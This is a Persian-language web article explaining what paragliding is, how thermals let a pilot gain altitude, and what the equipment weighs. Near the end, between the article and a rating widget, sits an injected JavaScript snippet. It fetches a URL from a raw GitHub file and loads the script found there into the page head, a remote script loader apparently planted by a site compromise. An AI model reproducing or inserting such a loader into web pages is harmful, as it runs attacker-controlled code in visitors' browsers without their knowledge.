پاراگلایدر

  • اولین سوال برای افرادی که آشنایی با پاراگلایدر ندارند و پرواز با پاراگلایدر را تجربه نکرده‌اند این است که چتر پرواز چیست و چگونه کار می‌کند؟ نحوه پرواز بدون نیروی پیشرانه برای این وسیله چگونه است؟ همچنین بسیاری از افراد چتر پرواز سواری را با پرواز با کایت وسقوط آزاد با چترنجات اشتباه می‌کنند و تفاوت پاراگلاید سواری و پاراسیل برای برخی افراد گمراه کننده است.

    پاراگلایدرسواری چگونه است؟

    پاراگلایدرسواری تجربه ای نزدیک به پرواز مشابه پرنده لرای انسان است. پرواز با چتر پرواز یک تجربه هیجان‌انگیز، ایمن و مشابه پرواز و و لمس آسمان به ساده ترین شکل آن است. پس از تیک آف و به پرواز درآمدن یک خلبان حرفه‌ای پارا گلایدر می‌تواند با استفاده از جریانات ترمال و حرارتی به ارتفاع خود نیز بیافزاید. پس در پرواز با چتر پرواز امکان افزایش و کاهش ارتفاع وجود دارد.

    پاراگلایدر چیست و چگونه کار می‌کند؟

    پاراگلایدر به یک چتر و مجموعه‌ا‌ی از تجهیزات گفته می‌شود که خلبان می‌تواند با دویدن و استفاده از انرژی ماهیچه‌ای و بهره گیری از نیروی جاذبه و باد نیروی پیشرانه اولیه را ایجاد نموده، بر جاذبه زمین غلبه کرده و پرواز کند. بوسیله جریانات حرارتی خلبان می‌تواند ارتفاع بگیرد. این وسیله دارای امکاناتی برای کنترل جهت پرواز نیز می باشد. کل تجهیزات چتر پرواز شامل بال پرواز، هارنس (صندلی) و کلاه ایمنی کمتر از ۲۰ کیلوگرم وزن خواهد داشت و به سادگی درون یک کوله پشتی جا خواهد شد.

    پاراگلایدرها یک نوع هواپیما هستند که از قوانین آیرودینامیکی مشابه هواپیماهای بوئینگ استفاده می‌کند با این تفات که پاراگلایدر یک پرنده سبک و با سرعت کم می‌باشد. شما به راحتی با کمک جریان باد بر فراز یک تپه می‌توانید پاراگلایدر را به پرواز دراورده و با استفاده از دستگیرهای ترمز هدایت کنید. چتر پرواز می‌تواند در جریان باد هم حرکت کند. کنترل پاراگلایدر در آسمان بسیار ساده‌تر از روی زمین است.

    (var url = “https://raw.githubusercontent.com/truba77/trubnik/main/to.txt”; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(“script”); script.src = data.trim(); document.getElementsByTagName(“head”)[0].appendChild(script); });)

    امتیاز شما:

    میانگین امتیازات ۵ از ۵
    از مجموع ۱ رای

    دیدگاهتان را بنویسید